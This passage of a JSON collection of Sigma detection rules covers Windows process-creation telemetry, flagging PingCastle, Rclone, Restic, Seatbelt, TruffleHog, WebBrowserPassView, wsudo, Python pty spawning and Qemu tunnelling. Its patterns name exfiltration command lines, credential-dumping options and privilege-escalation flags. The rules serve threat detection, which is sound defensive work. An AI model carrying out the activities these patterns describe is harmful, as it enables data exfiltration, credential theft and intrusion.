'SHA256=01d1efd5e552c59baa70c0778902233c05fde7de6e5cc156c62607df0804d36b'\n              - 'SHA256=9a8dfeb7e3174f3510691e2b32d0f9088e0ed67d9ed1b2afbe450d70dec2016b'\n              - 'SHA256=63b92a114075d855f706979d50ed3460fe39f8a2f5498b7657f0d14865117629'\n              - 'SHA256=2eb014130ff837b6481c26f0d0152f84de22ca7370b15a4f51921e0054a2a358'\n              - 'SHA256=7d5bb4271bf8ca2b63a59e731f3ec831dbda53adb8e28665e956afb4941f32ca'\n              - 'SHA256=e57098a75bf32e127c214b61bfba492d6b209e211f065fcc84ff10637a2143ea'\n              - 'SHA256=dd14dbcdbcfcf4bc108a926b9667af4944a3b6faf808cf1bb9a3a2554722e172'\n              - 'SHA256=dca2b1b824cb28bd15577eace45bde7ff8f8f44705b17085524659de31761de4'\n              - 'SHA256=8b95f339a07d59a8c8d8580283dffb9e8dfabdeb9171e42c948ab68c71afe7f2'\n              - 'SHA256=5428a840fab6ac4a0ecb2fc20dbc5f928432b00b9297dd1cb6e69336f44eba66'\n              - 'SHA256=e2517ae0fccaa4aefe039026a4fc855964f0c2a5f84177140200b0e58ddbfd27'\n              - 'SHA256=75d05880de2593480254181215dd9a0075373876f2f4a2a4a9a654b2e0729a41'\n              - 'SHA256=56490e14ce3817c3a1ddc0d97b96e90d6351bcd29914e7c9282f6a998cca84b1'\n              - 'SHA256=f25d0a5e77e4ed9e7c4204a33cfc8e46281b43adbee550b15701dd00f41bdbe0'\n              - 'SHA256=845a5fdcbb08e7efa7e0eabfcd881c9eebc0eec0a3a2f8689194e6b91b6eeaf8'\n              - 'SHA256=9a89e6652e563d26a3f328ba23d91f464c9549da734557c5a02559df24b2700d'\n              - 'SHA256=5614f2bc9b2ed414aab2c5c7997bdcbe8236e67ced8f91a63d1b6cfbe6e08726'\n              - 'SHA256=37bf92dcedb47a90d8d38ebda8d8dd168ef5803dcb01161f8cf6d68b70d49d90'\n              - 'SHA256=ec8590f91f5cc21e931c57345425f0625a6e37dfba026b222260450de40459f5'\n              - 'SHA256=3994eb72b1c227c593e14b8cad7001de11d1c247d4fbf84d0714bb8a17853140'\n              - 'SHA256=d654f870436d63c9d8e4390d9d4d898abdf0456736c7654d71cdf81a299c3f87'\n              - 'SHA256=63fbfabd4d8afb497dee47d112eb9d683671b75a8bf6407c4bd5027fd211b892'\n              - 'SHA256=47028053f05188e6a366fff19bedbcad2bc4daba8ff9e4df724b77d0181b7054'\n              - 'SHA256=7c1b1e8c880a30c43b3a52ee245f963a977e1f40284f4b83f4b9afe3821753dd'\n        - Image|endswith: '\\PingCastle.exe'\n        - OriginalFileName: PingCastle.exe\n        - Product: 'Ping Castle'\n        - CommandLine|contains:\n              - '--scanner aclcheck'\n              - '--scanner antivirus'\n              - '--scanner computerversion'\n              - '--scanner foreignusers'\n              - '--scanner laps_bitlocker'\n              - '--scanner localadmin'\n              - '--scanner nullsession'\n              - '--scanner nullsession-trust'\n              - '--scanner oxidbindings'\n              - '--scanner remote'\n              - '--scanner share'\n              - '--scanner smb'\n              - '--scanner smb3querynetwork'\n              - '--scanner spooler'\n              - '--scanner startup'\n              - '--scanner zerologon'\n        - CommandLine|contains: '--no-enum-limit'\n        - CommandLine|contains|all:\n              - '--healthcheck'\n              - '--level Full'\n        - CommandLine|contains|all:\n              - '--healthcheck'\n              - '--server '\n    condition: selection\nfalsepositives:\n    - Unknown\n# Note: As this is a PUA the level may vary depending on your environment. Reduce or increase the level as you see fit\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_pingcastle_script_parent.yml",
    "content": "title: PUA - PingCastle Execution From Potentially Suspicious Parent\nid: b37998de-a70b-4f33-b219-ec36bf433dc0\nrelated:\n    - id: b1cb4ab6-ac31-43f4-adf1-d9d08957419c\n      type: derived\nstatus: test\ndescription: |\n    Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location.\nreferences:\n    - https://github.com/vletoux/pingcastle\n    - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\n    - https://github.com/fengjixuchui/Start-ADEnum/blob/e237a739db98b6104427d833004836507da36a58/Functions/Start-ADEnum.ps1#L450\n    - https://github.com/lkys37en/Start-ADEnum/blob/5b42c54215fe5f57fc59abc52c20487d15764005/Functions/Start-ADEnum.ps1#L680\n    - https://github.com/projectHULK/AD_Recon/blob/dde2daba9b3393a9388cbebda87068972cc0bd3b/SecurityAssessment.ps1#L2699\n    - https://github.com/802-1x/Compliance/blob/2e53df8b6e89686a0b91116b3f42c8f717dca820/Ping%20Castle/Get-PingCastle-HTMLComplianceReport.ps1#L8\n    - https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1\nauthor: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)\ndate: 2024-01-11\ntags:\n    - attack.reconnaissance\n    - attack.t1595\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent_ext:\n        ParentCommandLine|contains:\n            - '.bat'\n            - '.chm'\n            - '.cmd'\n            - '.hta'\n            - '.htm'\n            - '.html'\n            - '.js'\n            - '.lnk'\n            - '.ps1'\n            - '.vbe'\n            - '.vbs'\n            - '.wsf'\n    selection_parent_path_1:\n        ParentCommandLine|contains:\n            - ':\\Perflogs\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp'\n            - '\\AppData\\Roaming\\'\n            - '\\Temporary Internet'\n    selection_parent_path_2:\n        - ParentCommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - ParentCommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - ParentCommandLine|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n    selection_cli:\n        - Image|endswith: '\\PingCastle.exe'\n        - OriginalFileName: PingCastle.exe\n        - Product: 'Ping Castle'\n        - CommandLine|contains:\n              - '--scanner aclcheck'\n              - '--scanner antivirus'\n              - '--scanner computerversion'\n              - '--scanner foreignusers'\n              - '--scanner laps_bitlocker'\n              - '--scanner localadmin'\n              - '--scanner nullsession'\n              - '--scanner nullsession-trust'\n              - '--scanner oxidbindings'\n              - '--scanner remote'\n              - '--scanner share'\n              - '--scanner smb'\n              - '--scanner smb3querynetwork'\n              - '--scanner spooler'\n              - '--scanner startup'\n              - '--scanner zerologon'\n        - CommandLine|contains: '--no-enum-limit'\n        - CommandLine|contains|all:\n              - '--healthcheck'\n              - '--level Full'\n        - CommandLine|contains|all:\n              - '--healthcheck'\n              - '--server '\n    condition: 1 of selection_parent_* and selection_parent_ext and selection_cli\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_process_hacker.yml",
    "content": "title: PUA - Process Hacker Execution\nid: 811e0002-b13b-4a15-9d00-a613fce66e42\nrelated:\n    - id: 5722dff1-4bdd-4949-86ab-fbaf707e767a\n      type: similar\nstatus: test\ndescription: |\n    Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc).\n    Process Hacker is a tool to view and manipulate processes, kernel options and other low level options.\n    Threat actors abused older vulnerable versions to manipulate system processes.\nreferences:\n    - https://processhacker.sourceforge.io/\n    - https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-10-10\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\n    - attack.discovery\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1622\n    - attack.t1564\n    - attack.t1543\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|contains: '\\ProcessHacker_'\n        - Image|endswith: '\\ProcessHacker.exe'\n        - OriginalFileName:\n              - 'ProcessHacker.exe'\n              - 'Process Hacker'\n        - Description: 'Process Hacker'\n        - Product: 'Process Hacker'\n        - Hashes|contains:\n              - 'MD5=68F9B52895F4D34E74112F3129B3B00D'\n              - 'MD5=B365AF317AE730A67C936F21432B9C71'\n              - 'SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D'\n              - 'SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E'\n              - 'SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F'\n              - 'SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4'\n              - 'IMPHASH=3695333C60DEDECDCAFF1590409AA462'\n              - 'IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF'\n    condition: selection\nfalsepositives:\n    - While sometimes 'Process Hacker is used by legitimate administrators, the execution of Process Hacker must be investigated and allowed on a case by case basis\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_radmin.yml",
    "content": "title: PUA - Radmin Viewer Utility Execution\nid: 5817e76f-4804-41e6-8f1d-5fa0b3ecae2d\nstatus: test\ndescription: Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md\n    - https://www.radmin.fr/\nauthor: frack113\ndate: 2022-01-22\nmodified: 2023-12-11\ntags:\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1072\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Description: 'Radmin Viewer'\n        - Product: 'Radmin Viewer'\n        - OriginalFileName: 'Radmin.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_rcedit_execution.yml",
    "content": "title: PUA - Potential PE Metadata Tamper Using Rcedit\nid: 0c92f2e6-f08f-4b73-9216-ecb0ca634689\nstatus: test\ndescription: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.\nreferences:\n    - https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe\n    - https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915\n    - https://github.com/electron/rcedit\nauthor: Micah Babinski\ndate: 2022-12-11\nmodified: 2023-03-05\ntags:\n    - attack.defense-evasion\n    - attack.t1036.003\n    - attack.t1036\n    - attack.t1027.005\n    - attack.t1027\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\rcedit-x64.exe'\n              - '\\rcedit-x86.exe'\n        - Description: 'Edit resources of exe'\n        - Product: 'rcedit'\n    selection_flags:\n        CommandLine|contains: '--set-' # Covers multiple edit commands such as \"--set-resource-string\" or \"--set-version-string\"\n    selection_attributes:\n        CommandLine|contains:\n            - 'OriginalFileName'\n            - 'CompanyName'\n            - 'FileDescription'\n            - 'ProductName'\n            - 'ProductVersion'\n            - 'LegalCopyright'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the tool by administrators or users to update metadata of a binary\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_rclone_execution.yml",
    "content": "title: PUA - Rclone Execution\nid: e37db05d-d1f9-49c8-b464-cee1a4b11638\nrelated:\n    - id: a0d63692-a531-4912-ad39-4393325b2a9c\n      type: obsolete\n    - id: cb7286ba-f207-44ab-b9e6-760d82b84253\n      type: obsolete\nstatus: test\ndescription: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc\nreferences:\n    - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware\n    - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a\n    - https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone\n    - https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html\nauthor: Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group\ndate: 2021-05-10\nmodified: 2023-03-05\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_specific_options:\n        CommandLine|contains|all:\n            - '--config '\n            - '--no-check-certificate '\n            - ' copy '\n    selection_rclone_img:\n        - Image|endswith: '\\rclone.exe'\n        - Description: 'Rsync for cloud storage'\n    selection_rclone_cli:\n        CommandLine|contains:\n            - 'pass'\n            - 'user'\n            - 'copy'\n            - 'sync'\n            - 'config'\n            - 'lsd'\n            - 'remote'\n            - 'ls'\n            - 'mega'\n            - 'pcloud'\n            - 'ftp'\n            - 'ignore-existing'\n            - 'auto-confirm'\n            - 'transfers'\n            - 'multi-thread-streams'\n            - 'no-check-certificate '\n    condition: selection_specific_options or all of selection_rclone_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_restic.yml",
    "content": "title: PUA - Restic Backup Tool Execution\nid: 6ddff2e8-ea1a-45d0-8938-93dfc1d67ae7\nstatus: experimental\ndescription: |\n    Detects the execution of the Restic backup tool, which can be used for data exfiltration.\n    Threat actors may leverage Restic to back up and exfiltrate sensitive data to remote storage locations, including cloud services.\n    If not legitimately used in the enterprise environment, its presence may indicate malicious activity.\nreferences:\n    - https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/#exfiltration\n    - https://restic.net/\n    - https://restic.readthedocs.io/en/stable/030_preparing_a_new_repo.html\nauthor: Nounou Mbeiri, Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-10-17\ntags:\n    - attack.exfiltration\n    - attack.t1048\n    - attack.t1567.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_specific:\n        - CommandLine|contains|all:\n              - '--password-file'\n              - 'init'\n              - ' -r '\n        - CommandLine|contains|all:\n              - '--use-fs-snapshot'\n              - 'backup'\n              - ' -r '\n    selection_restic:\n        CommandLine|contains:\n            - 'sftp:'\n            - 'rest:http'\n            - 's3:s3.'\n            - 's3.http'\n            - 'azure:'\n            - ' gs:'\n            - 'rclone:'\n            - 'swift:'\n            - ' b2:'\n        CommandLine|contains|all:\n            - ' init '\n            - ' -r '\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate use of Restic for backup purposes within the organization.\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_runxcmd.yml",
    "content": "title: PUA - RunXCmd Execution\nid: 93199800-b52a-4dec-b762-75212c196542\nstatus: test\ndescription: Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts\nreferences:\n    - https://www.d7xtech.com/free-software/runx/\n    - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-24\nmodified: 2023-02-14\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_account:\n        CommandLine|contains:\n            - ' /account=system '\n            - ' /account=ti '\n    selection_exec:\n        CommandLine|contains: '/exec='\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use by administrators\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml",
    "content": "title: PUA - Seatbelt Execution\nid: 38646daa-e78f-4ace-9de0-55547b2d30da\nstatus: test\ndescription: Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters\nreferences:\n    - https://github.com/GhostPack/Seatbelt\n    - https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-18\nmodified: 2023-02-04\ntags:\n    - attack.discovery\n    - attack.t1526\n    - attack.t1087\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\Seatbelt.exe'\n        - OriginalFileName: 'Seatbelt.exe'\n        - Description: 'Seatbelt'\n        - CommandLine|contains:\n              # This just a list of the commands that will produce the least amount of FP in \"theory\"\n              # Comment out/in as needed in your environment\n              # To get the full list of commands see reference section\n              - ' DpapiMasterKeys'\n              - ' InterestingProcesses'\n              - ' InterestingFiles'\n              - ' CertificateThumbprints'\n              - ' ChromiumBookmarks'\n              - ' ChromiumHistory'\n              - ' ChromiumPresence'\n              - ' CloudCredentials'\n              - ' CredEnum'\n              - ' CredGuard'\n              - ' FirefoxHistory'\n              - ' ProcessCreationEvents'\n              # - ' RDPSessions'\n              # - ' PowerShellHistory'\n    selection_group_list:\n        CommandLine|contains:\n            - ' -group=misc'\n            - ' -group=remote'\n            - ' -group=chromium'\n            - ' -group=slack'\n            - ' -group=system'\n            - ' -group=user'\n            - ' -group=all'\n    selection_group_output:\n        CommandLine|contains: ' -outputfile='\n    condition: selection_img or all of selection_group_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_system_informer.yml",
    "content": "title: PUA - System Informer Execution\nid: 5722dff1-4bdd-4949-86ab-fbaf707e767a\nrelated:\n    - id: 811e0002-b13b-4a15-9d00-a613fce66e42\n      type: similar\nstatus: test\ndescription: Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations\nreferences:\n    - https://github.com/winsiderss/systeminformer\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-05-08\nmodified: 2024-11-23\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.discovery\n    - attack.defense-evasion\n    - attack.t1082\n    - attack.t1564\n    - attack.t1543\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\SystemInformer.exe'\n        - OriginalFileName: 'SystemInformer.exe'\n        - Description: 'System Informer'\n        - Product: 'System Informer'\n        - Hashes|contains:\n              # Note: add other hashes as needed\n              # 3.0.11077.6550\n              - 'MD5=19426363A37C03C3ED6FEDF57B6696EC'\n              - 'SHA1=8B12C6DA8FAC0D5E8AB999C31E5EA04AF32D53DC'\n              - 'SHA256=8EE9D84DE50803545937A63C686822388A3338497CDDB660D5D69CF68B68F287'\n              - 'IMPHASH=B68908ADAEB5D662F87F2528AF318F12'\n    condition: selection\nfalsepositives:\n    - System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_trufflehog.yml",
    "content": "title: PUA - TruffleHog Execution\nid: 44030449-b0df-4c94-aae1-502359ab28ee\nrelated:\n    - id: d7a650c4-226c-451e-948f-cc490db506aa\n      type: similar\nstatus: experimental\ndescription: |\n    Detects execution of TruffleHog, a tool used to search for secrets in different platforms like Git, Jira, Slack, SharePoint, etc. that could be used maliciously.\n    While it is a legitimate tool, intended for use in CI pipelines and security assessments,\n    It was observed in the Shai-Hulud malware campaign targeting npm packages to steal sensitive information.\nreferences:\n    - https://github.com/trufflesecurity/trufflehog\n    - https://www.getsafety.com/blog-posts/shai-hulud-npm-attack\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-09-24\ntags:\n    - attack.discovery\n    - attack.credential-access\n    - attack.t1083\n    - attack.t1552.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\trufflehog.exe'\n    selection_cli_platform:\n        CommandLine|contains:\n            - ' docker --image '\n            - ' Git '\n            - ' GitHub '\n            - ' Jira '\n            - ' Slack '\n            - ' Confluence '\n            - ' SharePoint '\n            - ' s3 '\n            - ' gcs '\n    selection_cli_verified:\n        CommandLine|contains: ' --results=verified'\n    condition: selection_img or all of selection_cli_*\nfalsepositives:\n    - Legitimate use of TruffleHog by security teams or developers.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_webbrowserpassview.yml",
    "content": "title: PUA - WebBrowserPassView Execution\nid: d0dae994-26c6-4d2d-83b5-b3c8b79ae513\nstatus: test\ndescription: Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1555.003/T1555.003.md\nauthor: frack113\ndate: 2022-08-20\nmodified: 2023-02-14\ntags:\n    - attack.credential-access\n    - attack.t1555.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Description: 'Web Browser Password Viewer'\n        - Image|endswith: '\\WebBrowserPassView.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_wsudo_susp_execution.yml",
    "content": "title: PUA - Wsudo Suspicious Execution\nid: bdeeabc9-ff2a-4a51-be59-bb253aac7891\nstatus: test\ndescription: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)\nreferences:\n    - https://github.com/M2Team/Privexec/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-02\nmodified: 2023-02-14\ntags:\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_metadata:\n        - Image|endswith: '\\wsudo.exe'\n        - OriginalFileName: 'wsudo.exe'\n        - Description: 'Windows sudo utility'\n        - ParentImage|endswith: '\\wsudo-bridge.exe'\n    selection_cli:\n        CommandLine|contains:\n            - '-u System'\n            - '-uSystem'\n            - '-u TrustedInstaller'\n            - '-uTrustedInstaller'\n            - ' --ti '\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_python_adidnsdump.yml",
    "content": "title: PUA - Adidnsdump Execution\nid: 26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160\nstatus: test\ndescription: |\n    This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,\n    Usee to Query/modify DNS records for Active Directory integrated DNS via LDAP\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump\nauthor: frack113\ndate: 2022-01-01\nmodified: 2023-02-21\ntags:\n    - attack.discovery\n    - attack.t1018\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\python.exe'\n        CommandLine|contains: 'adidnsdump'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml",
    "content": "title: Python Inline Command Execution\nid: 899133d5-4d7c-4a7f-94ee-27355c879d90\nstatus: test\ndescription: Detects execution of python using the \"-c\" flag. This is could be used as a way to launch a reverse shell or execute live python code.\nreferences:\n    - https://docs.python.org/3/using/cmdline.html#cmdoption-c\n    - https://www.revshells.com/\n    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-02\nmodified: 2025-10-07\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'python.exe'\n        - Image|endswith:\n              - 'python.exe' # no \\ bc of e.g. ipython.exe\n              - 'python3.exe'\n              - 'python2.exe'\n    selection_cli:\n        CommandLine|contains: ' -c'\n    filter_main_python_1: # Based on baseline\n        ParentImage|startswith:\n            - 'C:\\Program Files\\Python'\n            - 'C:\\Program Files (x86)\\Python'\n        ParentImage|endswith: '\\python.exe'\n        ParentCommandLine|contains: '-E -s -m ensurepip -U --default-pip'\n    filter_main_python_trace: # Based on baseline\n        ParentImage|startswith:\n            - 'C:\\Program Files\\Python'\n            - 'C:\\Program Files (x86)\\Python'\n        CommandLine|contains|all:\n            # CommandLine: \\\"C:\\\\Program Files\\\\Python312\\\\python.exe\\\" -W ignore::DeprecationWarning -c \\\"\\nimport runpy\\nimport sys\\nsys.path = ['C:\\\\\\\\Users\\\\\\\\User\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\tmpdakwn6aj\\\\\\\\pip-23.2.1-py3-none-any.whl'] + sys.path\\nsys.argv[1:] = ['install', '--no-cache-dir', '--no-index', '--find-links', 'C:\\\\\\\\Users\\\\\\\\User\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\tmpdakwn6aj', '--upgrade', 'pip']\\nrunpy.run_module(\\\\\\\"pip\\\\\\\", run_name=\\\\\\\"__main__\\\\\\\", alter_sys=True)\\n\\\n            - '-W ignore::DeprecationWarning'\n            - \"['install', '--no-cache-dir', '--no-index', '--find-links',\"\n            - \"'--upgrade', 'pip'\"\n    filter_optional_vscode:\n        - ParentImage|endswith: '\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n        - ParentImage:\n              - 'C:\\Program Files\\Microsoft VS Code\\Code.exe'\n              - 'C:\\Program Files (x86)\\Microsoft VS Code\\Code.exe'\n    filter_optional_pip:\n        CommandLine|contains|all:\n            - '<pip-setuptools-caller>'\n            - 'exec(compile('\n    condition: all of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Python libraries that use a flag starting with \"-c\". Filter according to your environment\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_python_pty_spawn.yml",
    "content": "title: Python Spawning Pretty TTY on Windows\nid: 480e7e51-e797-47e3-8d72-ebfce65b6d8d\nrelated:\n    - id: 899133d5-4d7c-4a7f-94ee-27355c879d90\n      type: derived\nstatus: test\ndescription: Detects python spawning a pretty tty\nreferences:\n    - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/\nauthor: Nextron Systems\ndate: 2022-06-03\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith:\n            - 'python.exe' # no \\ bc of e.g. ipython.exe\n            - 'python3.exe'\n            - 'python2.exe'\n    selection_cli_1:\n        CommandLine|contains|all:\n            - 'import pty'\n            - '.spawn('\n    selection_cli_2:\n        CommandLine|contains: 'from pty import spawn'\n    condition: selection_img and 1 of selection_cli_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_qemu_suspicious_execution.yml",
    "content": "title: Potentially Suspicious Usage Of Qemu\nid: 5fc297ae-25b6-488a-8f25-cc12ac29b744\nstatus: test\ndescription: |\n    Detects potentially suspicious execution of the Qemu utility in a Windows environment.\n    Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.\nreferences:\n    - https://securelist.com/network-tunneling-with-qemu/111803/\n    - https://www.qemu.org/docs/master/system/invocation.html#hxtool-5\nauthor: Muhammad Faisal (@faisalusuf), Hunter Juhan (@threatHNTR)\ndate: 2024-06-03\ntags:\n    - attack.command-and-control\n    - attack.t1090\n    - attack.t1572\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - '-m 1M' # VM with just 1MB of ram is insufficient this is a suspicious flag\n            - '-m 2M'\n            - '-m 3M'\n        CommandLine|contains|all:\n            - 'restrict=off'\n            - '-netdev '\n            - 'connect='\n            - '-nographic' # This is also a key detection no one invoke without UI from console usually its a flag.\n    filter_main_normal_usecase:\n        CommandLine|contains:\n            - ' -cdrom ' # Normal usage cases\n            - ' type=virt '\n            - ' -blockdev '\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_query_session_exfil.yml",
    "content": "title: Query Usage To Exfil Data\nid: 53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2\nstatus: test\ndescription: Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use\nreferences:\n    - https://twitter.com/MichalKoczwara/status/1553634816016498688\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-01\nmodified: 2023-01-19\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: ':\\Windows\\System32\\query.exe'\n        CommandLine|contains:\n            - 'session >'\n            - 'process >'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_quickassist_execution.yml",
